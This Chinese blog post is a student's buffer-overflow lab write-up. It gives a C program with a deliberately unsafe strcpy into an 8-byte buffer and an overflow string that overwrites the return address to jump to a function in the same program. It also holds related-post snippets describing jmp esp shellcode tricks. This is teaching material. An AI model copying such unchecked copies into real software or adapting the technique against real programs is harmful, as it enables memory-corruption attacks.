缓冲区溢出工具实践,华工信息安全实验

最新推荐文章于 2020-09-18 21:57:13 发布
最新推荐文章于 2020-09-18 21:57:13 发布
阅读量1.1k 收藏
点赞数
分类专栏: 加密解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ku360517703/article/details/8892954
版权

参考博文:http://ftcl.hit.edu.cn/main/?p=585

原文代码基本都漏掉转移符号"\",还有个不明所以的amp,应该是html代码复制时候带的垃圾

如果需要代码可以复制我下面的代码

您重新编译的代码大概跟我的代码,在虚拟地址空间中的地址是不一样的。也就是说应该不会是00401344


编码平台 :

OSWindows7

IDECodeblocks + minGW

语言和库:C

程序代码:

#include <stdio.h>;

void haha()

{

    printf("\nOK!success");

}

void fun(const char* input)

{

       char buf[8];

       printf("Addr of buf = %p\n", &buf);

       strcpy(buf,input);

       printf("%s\n", buf);

}

int main(int argc, char* argv[])

{

        printf("Address of foo=%p\n",fun);

        printf("Address of haha=%p\n",haha);

        char ss[]="ABCDABCDABCDABCDABCD\x44\x13\x40\x00";

        fun(ss);

        return 0;

}

理由解释如上图,图片是用著名反汇编程序OllyDbg反汇编得出的。

如图分析,所以得到缓冲区写入数据应该要是

char ss[]="ABCDABCDABCDABCDABCD\x44\x13\x40\x00";

其中44 13 40 00是因为大端,所以按字节反序。

00134000haha函数的开头。

不过有个小问题是,溢出攻击成功后,Windows会发现,大概是因为haha函数最后是retn的汇编代码,但是堆栈中相对应的位置不是一个返回地址(可能是垃圾数据等非可执行汇编代码)。由于是选修信息安全且没有系统地学习汇编语言,也就没有继续深究怎样构造缓冲区可以正常结束程序。

根据经验,编译好的文件在别的电脑上运行时候的非动态分配的地址都是固定的,也就是说这个实验结果应该是可以在其他机子上复原的。不过用代码在别的机子重新编译,也许就不行了,所以这次实验顺便连带应用程序也上交了。

ku360517703
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
缓冲区溢出漏洞实验报告
10-15
**缓冲区溢出漏洞实验报告** 缓冲区溢出是一种常见的软件安全漏洞,主要发生在程序处理数据时,未能正确检查输入数据的长度,导致超出预定内存分配的边界,从而覆盖相邻内存区域的数据。这种漏洞常常被恶意攻击者...
缓冲区溢出实验
10-29
**缓冲区溢出实验** 缓冲区溢出是计算机科学中一个重要的安全问题,尤其是在软件开发领域。这个实验将深入探讨这一主题,理解其原理,并学习如何预防和应对这种漏洞。 ### 1. 缓冲区溢出的概念 缓冲区溢出...
栈溢出:strcpy()造成的缓冲区溢出
anddy926的专栏
12-28 4251
代码: #include  #include  void fun(const char* input) {        char buf[8];        printf("My stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");        strcpy(buf,input);        printf("%s\n",b
缓冲区溢出攻击”原理分析及实例演示
songyux6的专栏
10-18 6650
一.原理分析 缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。 要了解缓冲区溢出攻击,就得先了解程序函数调用的栈内存分布: 如上图所示:堆栈帧的顶部为函数的实参,下面是函数的返回地址以及前一个堆栈帧的指针,最
c语言printf相关函数 格式化字符串攻击 简介
whatday的专栏
09-18 721
目录 一、类printf函数簇实现原理 二、格式化字符串攻击原理 三、一个实际的例子 一、类printf函数簇实现原理 类printf函数的最大的特点就是,在函数定义的时候无法知道函数实参的数目和类型。 对于这种情况,可以使用省略号指定参数表。 带有省略号的函数定义中,参数表分为两部分,前半部分是确定个数、确定类型的参数,第二部分就是省略号,代表数目和类型都不确定的参数表,省略号参数表中参数的个数和参数的类型是事先的约定计算出来的,每个实参的地址(指针)是根据确定参数表中最后一个实参的地址算出
关于缓冲区溢出攻击原理的简单例子(C语言编写)
热门推荐
u012043391的专栏
01-04 1万+
一、什么是缓冲区溢出缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,使得溢出的数据覆盖在合法数据上,通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。   二、程序的简单说明 执行过程: void fun()函数中buf只分配了8字节的空间,通过写超出其长度的字符串ss,并传入vo
【程序改错】指针类型方面
Read by heart
09-02 213
1.题目来源102,下面拟要给一个数组赋值 #include <stdio.h> #include <stdlib.h> int i = 0; void fun(char** s, unsigned int n) { if (n > 9) { fun(s, n / 10); } **s = n % 10; (*s)++; putchar(**s)...
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序)
04-18
3.缓冲区溢出演示 4.溢出攻击结果与危害 5.防御手段 适合人群: 具备一定编程基础,作业时间不够的学生,对缓冲区溢出原理不了解的初学者 环境: IDA pro7.6, vc++ ,x32dbg。 阅读建议: 有一点 x32dbg逆向工具...
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验实验报告的主要目的是了解缓冲区溢出漏洞的原理和实验过程。缓冲区溢出漏洞是一种常见的安全漏洞,攻击者可以通过溢出缓冲区来 inject恶意代码,从而控制...
缓冲区溢出利用实验(详细步骤)
02-23
由于程序的运行机制,假设利用 strcpy()函数进行字符串赋值,因定义的字符 串及输入字符串长度不一致或过长,从而占用了 ebp(栈底)和 call(函数)返回地址的栈 区。基于此可利用修改的函数调用结束后的返回地址...
缓冲区溢出实验报告
08-26
本文档是关于缓冲区溢出实现的整个流程,对做缓冲区溢出有一定的帮助
C语言标准库概览详述[8]-标准IO<stdio.h>
左木右易
09-19 1163
头文件定义了用于输入和输出的函数、类型和宏。最重要的类型是用于声明文件指针的FILE。另外两个常用的类型是size_t和fpos_t,size_t是由运算符sizeof产生的无符号整类型;fpos_t类型定义能够唯一说明文件中的每个位置的对象。由头部定义的最有用的宏是EOF,其值代表文件的结尾。 8.1文件操作 8.1.1 fopen FILE *fopen(const char *file
sprintf缓冲区溢出
weixin_34127717的博客
11-02 320
这段代码的shellcode是抄的别人的,仅仅显示出一个msgbox提醒一下。编译器为 vc 2005操作系统为 xp sp3如果你的编译器或者操作系统不完全相同,有可能溢出失败大概原理为:  执行sprintf时,将我们构造的长字符串拷贝到堆栈区,从而覆盖了fun函数的返回地址(字符串16字节处),而此时esp正好指向字符串20字节处,因此我们将16处覆盖为jmp esp指令的地址, 将20字节...
缓冲区溢出漏洞
vergilben的学习日记
04-03 1万+
缓冲区溢出 缓冲区溢出是指当计算机向缓冲区内填充数据时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。 理想的情况是:程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下了隐患。操作系统所使用的缓冲区,又被称为"堆栈"。在各个操作进程之间,指令会被临时储存在“堆栈”中,“堆栈”也会出现缓冲区溢出缓冲区溢出的危害...
缓冲区溢出工具StackShield分析
softee的专栏
11-26 2725
StackShield是一个防止缓冲区溢出工具。主要是通过数组来保存返回地址,避免stack smashing攻击。stack smashing攻击如下图所示。图中展示的是x86下的一个栈帧结构,攻击者利用C语言中不检查数组边界的特点,在往数组局部变量写值的时候,写越界,以特定的值覆盖返回地址,从而达到在程序返回时执行恶意代码的目的。 StackShield的防护思路是,另外开辟一个数组保
看程序体验缓冲区溢出漏洞
weixin_34266504的博客
12-27 128
 看程序体验缓冲区溢出漏洞      缓冲区溢出漏洞从计算机出现初期就已经存在,并且今天仍然存在。大多数Internet蠕虫程序使用缓冲区溢出漏洞来传播,甚至Internet Explorer中的O-day漏洞,2004年的Sasser是一个利用微软操作系统的Lsass缓冲区溢出漏洞就是由于缓冲区溢出造成的。    缓冲区溢出通常是向数组中写数据时,写入的数据的长度超出了数组原始定义的大小。C...
缓存区溢出检测工具BED
04-12 481
缓存区溢出检测工具BED 缓存区溢出(Buffer Overflow)是一类常见的漏洞,广泛存在于各种操作系统和软件中。利用缓存区溢出漏洞进行攻击,会导致程序运行失败、系统崩溃。渗透测试人员利用这...
信息安全】第一章 缓冲区溢出
Hacking_Henry的博客
06-18 707
测试
信息系统安全实验缓冲区溢出
最新发布
05-14
在信息系统安全实验中,缓冲区溢出可以作为一种攻击手段,对目标系统进行攻击。攻击者可以通过构造恶意输入,向目标系统的缓冲区中写入超出其容量的数据,从而实现缓冲区溢出攻击。这种攻击可以用于实现各种攻击目的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值